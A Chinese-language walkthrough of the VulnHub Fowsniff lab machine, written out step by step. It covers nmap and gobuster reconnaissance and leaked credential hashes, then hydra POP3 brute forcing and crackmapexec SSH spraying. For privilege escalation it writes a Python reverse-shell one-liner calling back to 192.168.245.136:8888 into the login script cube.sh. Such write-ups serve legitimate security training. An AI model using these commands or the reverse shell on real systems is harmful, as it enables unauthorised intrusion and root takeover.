声明#

1. 本文为个人跟随b站up主红队笔记学习vulnhub的fowsniff靶机的复现通关记录，旨在分享靶机和记录学习心得体会，讲解若有谬误之处欢迎指正。
2. 该靶机下载地址为’https://vulnhub.com/entry/fowsniff-1,262/‘

渗透流程#

1. 在vmware部署靶机并开机后，打开kali对靶机进行信息收集，使用nmap执行nmap -sn 192.168.245.0/24(请替换成你的网段)进行主机发现，发现图中的192.168.245.163为靶机。（192.168.245.136为我的kali虚拟机的地址）
2. 并进行端口发现，执行nmap --min-rate 10000 -p- 192.168.245.163，并对开放端口记录用于后续渗透，发现22、80、110、143端口。
3. 对端口进行详细扫描，执行nmap -sT -sV -sC -O -p22,80,110,143 192.168.245.163，得到端口详细服务内容和系统版本，110端口是pop3服务，143端口是imap服务。
4. 执行sudo nmap --script=vuln -p22,80,110,143 192.168.245.162用脚本扫一下漏洞，扫出部分目录和sql注入可能（简单看了下没什么利用空间）。
5. sudo gobuster dir -u http://192.168.245.163 --wordlist=/usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt目录爆破，简单看下几个目录。
6. 也可以尝试增加参数，爆破更多信息。
7. 访问80端口，简单了解背景，这个公司遭受了网络攻击，在紧急维护，依据提示攻击者将信息暴露在twitter上，但是现在本篇文章好像已经无法打开，重要的部分如下（提示用于pop3登录）： mauer@fowsniff:8a28a94a588a95b80163709ab4313aa4，mustikka@fowsniff:ae1644dac5b77c0cf51e0d26ad6d7e56，tegel@fowsniff:1dc352435fecca338acfd4be10984009，baksteen@fowsniff:19f5af754c31f1e2651edde9250d69bb，seina@fowsniff:90dc16d47114aa13671c697fd506cf26，stone@fowsniff:a92b8a29ef1183192e3d35187e0cfabd， mursten@fowsniff:0e9588cb62f4b6f27e33d449e2ba0b3b，parede@fowsniff:4d6e42f56e127803285a0a7649b5ab11，sciana@fowsniff:f7fd98d380735e859f8b2ffbbede5a7e。
8. 把以上用户名存入user.txt，密码解密后存入pwd.txt，尝试用hydra进行pop3爆破，hydra -L user.txt -P pwd.txt 192.168.245.163 pop3，爆破出来seina可用。
9. 使用nc连接110端口，参照pop3语句语法，查看邮件。
10. 查看邮件内容，获得了该公司给员工的临时密码S1ck3nBluff+secureshell。
11. crackmapexec爆破ssh，crackmapexec ssh IP -u user.txt -p "S1ck3nBluff+secureshell"，试出来了是baksteen。
12. 使用baksteen和密码进行ssh连接。

提权过程#

1. 为users组用户，find / -group user -type f 2>/dev/null搜索有权限文件，我们去看看cube.sh。
2. 这个是ssh连接欢迎界面的脚本，在用户连接ssh时执行，我们检查了有python3环境，试着写入反弹shell，python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.245.136",8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'。
3. 打开监听并重新进行ssh连接，成功提权。

其它补充与收获总结#

1. 端口服务解释：

• POP3：属于TCP/IP协议族，用户可以把邮件从服务器下载到本地，下载后该服务器上删掉该文件，节省服务器空间，在客户端的操作不会反馈到服务器上。
• IMAP：是一个应用层协议，不同的是，收取的邮件仍然保留在服务器上，同时在客户端上的操作都会反馈到服务器上，服务器上的邮件也会做相应的动作。

2. cubd.sh脚本虽然所属不是root，但是返回了root的权限，经过监控进程，登录时是root执行的该脚本，所以获得root的反弹shell，渗透过程中往往可以大胆尝试，有时会获取出乎意料的结果。